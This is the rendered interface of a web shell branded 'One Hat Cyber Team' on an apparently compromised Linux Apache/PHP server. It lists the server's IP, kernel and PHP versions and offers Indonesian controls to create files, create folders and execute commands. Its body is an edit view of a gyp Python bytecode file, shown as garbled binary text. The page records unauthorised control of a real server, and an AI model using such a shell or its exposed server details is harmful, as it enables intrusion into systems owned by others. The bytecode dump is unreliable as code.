One Hat Cyber Team
Your IP :
10.30.1.1
Server IP :
103.148.201.5
Server :
Linux web-olt 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
Server Software :
Apache/2.4.52 (Ubuntu)
PHP Version :
8.1.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3
/
dist-packages
/
gyp
/
__pycache__
/
Edit File:
MSVSUserFile.cpython-310.pyc
o p.a� � @ sT d Z ddlZddlZddlZddlZddlmZ dd� Zdd� Z G dd� de �ZdS ) z+Visual Studio user preferences file writer.� Nc C sh d| v sd| v r | S t j�dd��t j�}|D ]}t j�|| �}t j�|�r1t �|t j �r1| S q| S )a{ If there are no slashes in the command given, this function searches the PATH env to find the given command, and converts it to an absolute path. We have to do this because MSVS is looking for an actual file to launch a debugger on, not just a command line. Note that this happens at GYP time, so anything needing to be built needs to have a full path.�/�\�PATH� ) �os�environ�get�split�pathsep�path�join�isfile�access�X_OK)�command�pathsr �item� r �2/usr/lib/python3/dist-packages/gyp/MSVSUserFile.py�_FindCommandInPath s �r c C sX g }| D ]%}|� d�dkrd�|�d��}d| }n t�d|�r$d| }|�|� q|S )N�"���z""z"%s"z[ \t\n])�findr r �re�search�append)�args�new_args�argr r r �_QuoteWin32CommandLineArgs&